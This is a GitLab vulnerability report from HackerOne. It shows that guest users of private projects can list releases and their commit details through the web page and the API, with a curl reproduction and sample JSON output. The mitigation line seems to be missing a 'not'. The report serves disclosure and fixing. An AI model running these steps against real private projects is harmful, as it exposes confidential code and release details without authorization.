Guest users of private projects have access to releases
HackerOne report #478082 by xanbanx
on 2019-01-11, assigned to asaba
:
GitLab recently introduced Releases, a way to present tags in the user interface of GitLab. These releases are currently managed via the API. Releases are closely tight to ordinary git tags, and therefore also present similar information. However, guest users, who do not have access to the code, also have access to these releases and therefore have also access to this information related to the code.
Steps to reproduce
Tested on GitLab 11.7.0-rc4-ee
- Create a private, push some code, create a git tag, and a new release via the API. (In these steps the project is accessible via the namespace
joe/test-releases
) - Add a guest user to the project
- As the guest user open the following page:
https://gitlab.com/joe/test-releases/releases
Here, you can observe that the sidebar is not showing the releases page. However, you can access this page and retrieve the list of releases.
Similarly, you can also as a guest user you can retrieve the release via the API. Therefore, perform the following API call:
curl --request GET --header "PRIVATE-TOKEN: <GUEST-USER-TOKEN>" https://example.gitlab.com/api/v4/<project-id>/releases
This will return all releases including information like the tag, description, committing details, etc as shown below in the JSON output.
[
{
"tag_name": "secret-tag",
"description": "This is a secret security release mitigating vulnerabilities",
"name": "Secret Release",
"description_html": "<p dir=\"auto\">This is a secret security release mitigating vulnerabilities</p>",
"created_at": "2019-01-11T12:30:06.503Z",
"author": {
"id": 1,
"name": "joe",
"username": "joe",
"state": "active",
"avatar_url": "https://secure.gravatar.com/avatar/6466f73ed21b9d1624dee906821e9176?s=80&d=identicon",
"web_url": "https://example.gitlab.com/joe"
},
"commit": {
"id": "9acaed88330c5fcb7cd119e7b10af49d3a9a48ab",
"short_id": "9acaed88",
"title": "Add new file",
"created_at": "2019-01-11T12:25:04.000Z",
"parent_ids": [],
"message": "Add new file",
"author_name": "joe",
"author_email": "test@bar.com",
"authored_date": "2019-01-11T12:25:04.000Z",
"committer_name": "joe",
"committer_email": "test@bar.com",
"committed_date": "2019-01-11T12:25:04.000Z"
},
"assets": {
"count": 4,
"sources": [
{
"format": "zip",
"url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.zip"
},
{
"format": "tar.gz",
"url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.gz"
},
{
"format": "tar.bz2",
"url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.bz2"
},
{
"format": "tar",
"url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar"
}
],
"links": []
}
}
]
Similar to that, also the endpoint https://example.gitlab.com/api/v4/<project-id>/releases/:tag_name
is vulnerable to this.
Steps to mitigate
Perform proper authorization in the API and for the release page. Guests should have access to this information.
Impact
Guest users have access to private information like release details, etc...
Attachments
Warning: Attachments received through HackerOne, please exercise caution!